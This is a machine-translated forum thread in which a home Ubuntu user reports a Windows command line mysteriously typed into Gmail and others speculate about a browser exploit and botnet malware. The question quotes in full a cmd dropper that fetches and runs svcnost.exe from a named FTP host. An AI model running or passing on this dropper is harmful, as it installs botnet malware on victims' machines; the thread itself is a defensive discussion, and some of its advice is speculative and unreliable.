¿Cómo identificar si mi computadora con Linux fue pirateada?

La PC de mi casa generalmente está encendida, pero el monitor está apagado. Esta tarde llegué a casa del trabajo y encontré lo que parece un intento de pirateo: en mi navegador, mi Gmail estaba abierto (ese era yo), pero estaba en modo de composición con lo siguiente en el TOcampo:

md / c echo open cCTeamFtp.yi.org 21 >> usuario de ik & echo ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo Tienes propiedad

Esto me parece un código de línea de comando de Windows, y el mdinicio del código combinado con el hecho de que Gmail estaba en modo de composición, hace evidente que alguien intentó ejecutar un cmdcomando. Creo que tuve la suerte de no ejecutar Windows en esta PC, pero tengo otros que sí. Esta es la primera vez que algo así me ha sucedido. No soy un gurú de Linux, y no estaba ejecutando ningún otro programa aparte de Firefox en ese momento.

Estoy absolutamente seguro de que no escribí esto, y nadie más estaba físicamente en mi computadora. Además, recientemente cambié mi contraseña de Google (y todas mis otras contraseñas) a algo así, vMA8ogd7bvasí que no creo que alguien haya pirateado mi cuenta de Google.

¿Lo que acaba de suceder? ¿Cómo alguien presiona las teclas en mi computadora cuando no es la vieja máquina Windows de Granny la que ha estado ejecutando malware durante años, sino una nueva instalación reciente de Ubuntu?

Actualización:
Permítanme abordar algunos de los puntos y preguntas:

• Estoy en Austria, en el campo. Mi enrutador WLAN ejecuta WPA2 / PSK y una contraseña medianamente segura que no está en el diccionario; tendría que ser fuerza bruta y menos de 50 metros de aquí; No es probable que haya sido pirateado.
• Estoy usando un teclado con cable USB, por lo que nuevamente es muy poco probable que alguien pueda estar dentro del alcance para hackearlo.
• No estaba usando mi computadora en ese momento; simplemente estaba inactivo en casa mientras yo estaba en el trabajo. Es una PC nettop montada en un monitor, por lo que rara vez la apago.
• La máquina tiene solo dos meses, solo ejecuta Ubuntu y no estoy usando software extraño o visitando sitios extraños. Es principalmente Stack Exchange, Gmail y periódicos. No juegos. Ubuntu está configurado para mantenerse actualizado.
• No conozco ningún servicio VNC en ejecución; Ciertamente no he instalado ni habilitado uno. Tampoco he iniciado ningún otro servidor. ¿No estoy seguro si alguno se está ejecutando en Ubuntu por defecto?
• Conozco todas las direcciones IP en la actividad de la cuenta de Gmail. Estoy bastante seguro de que Google no era una entrada.
• Encontré un Visor de archivos de registro , pero no sé qué buscar. ¿Ayuda?

Lo que realmente quiero saber es, y lo que realmente me hace sentir inseguro, es: ¿cómo puede alguien de Internet generar pulsaciones de teclas en mi máquina? ¿Cómo puedo evitar eso sin ser tan tonto? No soy un geek de Linux, soy un padre que ha estado jugando con Windows por más de 20 años y estoy cansado de eso. Y en los más de 18 años de estar en línea, nunca he visto personalmente ningún intento de pirateo, por lo que esto es nuevo para mí.

Dudo que tengas algo de qué preocuparte. Era más que probable un ataque de JavaScript que intentara hacer una unidad por descarga . Si le preocupa que esto suceda, comience a usar NoScript y AdBlock Plus Firefox Add-Ons.

Incluso al visitar sitios confiables no está seguro porque ejecutan código JavaScript de anunciantes externos que pueden ser maliciosos.

Lo agarré y lo ejecuté en una máquina virtual. Instaló mirc y este es el registro de estado ... http://pastebin.com/Mn85akMk

Es un ataque automatizado que intenta hacer que descargue mIRC y se una a una botnet que lo convertirá en un robot de spam ... Tenía mi VM unida y conectó a varias direcciones remotas diferentes, una de las cuales es autoemail-119.west320.com.

Ejecutándolo en Windows 7 tuve que aceptar el aviso de UAC y permitirle el acceso a través del firewall.

Parece que hay muchos informes de este comando exacto en otros foros, y alguien incluso dice que un archivo torrent intentó ejecutarlo cuando terminó la descarga ... Sin embargo, no estoy seguro de cómo sería posible.

No lo he usado yo mismo, pero debería poder mostrarle las conexiones de red actuales para que pueda ver si está conectado a algo fuera de lo normal: http://netactview.sourceforge.net/download.html

Estoy de acuerdo con @ jb48394 en que probablemente sea un exploit de JavaScript, como todo lo demás en estos días.

El hecho de que trató de abrir una cmdventana (ver el comentario de @ torbengb ) y ejecutar un comando malicioso, en lugar de simplemente descargar el troyano discretamente en segundo plano, sugiere que explota cierta vulnerabilidad en Firefox que le permite ingresar pulsaciones de teclas, pero No ejecutar código.

Esto también explica por qué este exploit, que se escribió claramente exclusivamente para Windows, también funcionaría en Linux: Firefox ejecuta JavaScript de la misma manera en todos los sistemas operativos (al menos, intenta :)) . Si fuera causado por un desbordamiento del búfer o una vulnerabilidad similar para Windows, simplemente habría bloqueado el programa.

En cuanto a de dónde vino el código JavaScript, probablemente un anuncio malicioso de Google (los anuncios circulan en Gmail durante todo el día) . Que no iba a ser la primera vez .

Encontré un ataque similar en otra máquina Linux. Parece que es algún tipo de comando FTP para Windows.

Esto no responde a toda su pregunta, pero en el archivo de registro busque intentos fallidos de inicio de sesión.

Si hay más de cinco intentos fallidos en su registro, alguien intentó descifrarlo root. Si hay un intento exitoso de iniciar sesión rootmientras estaba lejos de su computadora, ¡CAMBIE SU CONTRASEÑA INMEDIATAMENTE! ¡Quiero decir AHORA MISMO! Preferiblemente a algo alfanumérico, y aproximadamente 10 caracteres de largo.

Con los mensajes que recibiste (los echocomandos) esto realmente suena como un script para niños inmaduros . Si se tratara de un verdadero hacker que sabe lo que está haciendo, probablemente aún no lo sabría.

whois informa que west320.com es propiedad de Microsoft.

¿UPnP y Vino (Sistema -> Preferencias -> Escritorio remoto) combinados con una contraseña de Ubuntu débil?

¿Utilizaste repositorios no estándar?

DEF CON tiene una competencia de Wi-Fi cada año en cuanto a qué tan lejos se puede llegar a un punto de acceso a Wi-Fi, la última vez que escuché que era 250 millas.

Si realmente quieres asustarte, mira las capturas de pantalla de un centro de comando y control de una botnet Zeus . Ninguna máquina es segura, pero Firefox en Linux es más seguro que el resto. Aún mejor, si ejecuta SELinux .